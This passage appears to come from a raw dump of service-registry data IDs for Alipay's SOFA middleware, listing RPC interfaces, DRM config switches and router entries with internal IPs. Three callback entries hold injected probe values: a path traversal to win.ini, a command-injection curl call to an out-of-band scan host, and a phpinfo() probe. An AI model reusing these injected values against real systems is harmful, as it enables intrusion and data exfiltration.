FAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.xts.ElasticSwitcher.elasticRuleForAcctransNew,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:codebase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.atd:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.signExpireEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.common.service.facade.execute.callback.ChangeServiceExecutionCallback:1.0:jobOpsCloudExecutionCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.gfas.gfasShardingDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:paygrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.SecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.coverage.suminsured.increase@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.UserEntitySubscribeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_GRDC_GLOBAL_SYNC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_O_USER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.174.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.55.210.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bknetflowsecmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.OpsChangeService:1.0:AUTOTEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkbcs.common.service.facade.factoring.api.FactoringContractAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.UsageAgreementServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finslip.common.service.facade.notify.RemedyNotifyService:1.0:remedyInstInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.envcenter:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.182#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.largeStockFileWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.habaseline.common.facade.view.singleTrans.service.SingleTransQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cardbin.common.service.facade.CardBinInterveneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.cloudinc.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.44.119#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.96.110#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chair-script:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compass.common.service.facade.api.ConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.isStatisticsExec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:icomparacenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fraudmng.common.service.facade.redblue.api.RedBlueAttackDefenseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:innertransAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:airbops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.CapacityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","mdeduct@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.biz.userhome.drm.UserHomeDRM.refreshMsgSceneStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbshopdetail.neardata.query.service.RouteConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.common.service.facade.NotifyFacade:1.0:security@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:fbepservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:channelspop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirefront.service.facade.api.AcquireVostroAccountNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.version.SummaryTableVersionOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.18.116.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditplan.query.PcreditPlanQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServProdCompBaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rcdprod.facade.api.DeclareRecordManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.126.47#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.gotone.common.service.api.MessageSendService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:pgm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cfaccounttrans.facade.innertrans.InnerTransAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pkgcore.common.service.facade.MiniAppPackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantRelationQueryMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DDSCONSOLE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settleprod.service.facade.RefundChargeService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_COURIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ideploy.common.service.facade.schedule.ShiftManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:prodtrans@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.160.106#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.nfcc.common.service.facade.agna.AgnaRegionUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.aip.detail.drm.AipOrderDRMResource.deleteProtocolCodeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchstoreapp.common.service.facade.store.manage.StoreOpenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.biz.rpc.ppoint.PartnerPointQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcif.common.service.facade.api.merchant.MerchantBrandRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.i18n.facade.CapI18nService:1.0:internal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:tradefront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.FincomposeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.StandardFundLogFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.graycore.common.service.facade.model.meta.CztbaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilecodec.service.facade.CodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:tradequote@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","kbservcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.pagecomponent.PageComponentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.core.AutoCoreCityConfigFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:ecsportal#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ifxquote.common.service.client.integration.IfxQuoteInnerQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_FINRESEARCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.poscore:name=com.alipay.zcache.switcher.customerv2.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-S_EBILLCENTER_SCHEDULER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;curl http://GIYHU5BSMQWTC5LVPJRW2LK7NFXHA5LUL5RWQYLSONSXILLEHFZTO3DZMFUQ----.rce.scan.noble.dn5l0g.co;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.gcard.GCardChannelSetupService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.EmpowermentTrainingFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:phpinfo();@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.skipAllStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dchainconfigcenter.facade.prodcenter.product.api.ProductManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthcore.common.service.facade.api.child.GiftChildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.itemquality.ItemQualityManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pucprod.common.service.facade.ai.AIUtilityBillFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:finassetbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_SALESMNG_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardPayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.ZdatabusClientSyncRemoveDRM.discardCtu,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudlego:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ifxquote.biz.manager.quote.ClientQuoteManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.188.65#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.179.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ropcn.common.service.facade.api.RopRecoverFundsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zparamcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.addpInsttradeTairRz.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.fc.mif.common.service.facade.MerchantShopGzonePageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.154.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:rockcodecore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.core.service.processor.Processor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.scienguide.ActionCfgManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.financeprod:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.188.136#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.ordermng.common.util.drm.LoggerDRM.dalDetailLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:accorder.product.mFundEntrusted@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gotone.common.service.api.ReceiveGotoneSmsService:1.0:findecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpdcore:name=com.alipay.fin.prodquery.client.Cache.catalogTree.dump,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scibase.facade.datamerge.DataMergeRestFacade:1.0@rest#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.TaskQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:acmshangcheng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rinsight.biz.customized.spi.RuleRouteSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.common.service.facade.ErrorCodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqInfluenceNormalizationDrm.zhihuInfluenceThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilecodec.service.component.DynamicCodeCompShowService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.charge.goldenMysqlReadDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.213.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.unknownErrorIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cloud.apfasmng.common.service.facade.serverlesspaastraffic.ServerlessPaasTrafficFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@securitycore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","bar@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.superapi.client.SystemAppInvokeService:1.0:kbsales@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.blackPropKeysToBill,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthprod.facade.HealthContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.kbcscenter.KbpunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mivsAnnouncementCheckCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.msgbroker.MsgBrokerListener:1.0:securityops@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.finesee.FsTableMetaServiceV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtrade.common.service.facade.activity.FundContractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.contractquality.api.parse.ParseService:1.0:alipayCN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cpcenter.common.service.api.ServiceEventReplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessCallback:1.0:dsmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.achelmetcore.common.service.facade.SecurityRecordFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.agdscsalipay.common.service.facade.product.BlackListDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.tenant.client.biz.service.TenantService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.ServicePointPublishService:1.0.0:incService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.spcenter.facade.business.policy.PolicyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessCallback:1.0.0:finmng-reserveChlOptPMCCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finopencore-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.morphodatatwa.api.middleware:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.8.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.client.SystemAppInvokeService:1.0:idpatrol@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.darwin.common.service.facade.api.LaunchAdminFacade:1.0:mobileappcommon@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.76.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkloansupport_loan_task_cancel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifeprod.common.facade.management.CustomerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.common.service.facade.api.EinvMerchantQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbprod.apportion.service.ApportionOverdueService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotvilla.common.service.facade.api.manager.FundEventManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mqconsole.facade.SSOFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.ordermng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.arcore.common.service.facade.migrate.ArOrderLinkMigrateRollbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.cicada.InsTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.session.SessionRelationQueryCzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csrobot.service.facade.mng.api.CheckTaskMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.MobileCityQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.BizOperateLogQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.community.drm.CommunityDrm.compatibleOldVersionInvitationDb,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.SecurityProductApplyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.zhihuMediaLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbreservationprod.common.service.facade.reservationorder.MerchantReservationOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.biz.shared.repository.ZdalSequenceRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aix@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csactive.common.service.facade.mng.service.MessageEventService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.ZoneEnvQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","cn.com.antcloud.acorchestracore.facade.SchedulerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.consistCheckWhiteListString,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.memberprod.common.service.anttoken.AntAccessTokenService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocommopt:name=com.alipay.promocommopt.common.drm.ThemeModuleDrmResource.waitTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.promotion.common.service.facade.api.activity.ActivityApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:exClientTradeExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_EC-pcinstacc-querydqcstate-schedule-serverless@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasset.biz.shared.qrcode.KoubeiQrcodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.sync.FinstrategySwitchConfigDrmImpl.switchOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.42.45#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findatacanal.common.service.manage.PlateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.CloudMonitorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscharityprod.common.service.facade.MyChainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.datariskmarket.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.210#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.decisionx.engine.common.coordinator.service.ConfigLoadService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveAssemblyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseacommon.common.dynamic2.spi.service.Dynamic2ConfigService:1.0:gmportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:timeout_settle_recovery_settle_apply@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.PdfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductRequirementFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA-SCHEDULER-S-S-gfacceptance-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.imkteye.common.service.facade.api.statistics.StatisticsFacada:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igopcore.common.service.facade.api.sandbox.SandboxClearingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundcardprod.common.service.fundcard.ZdatabusMsgResolveFacade:1.0@D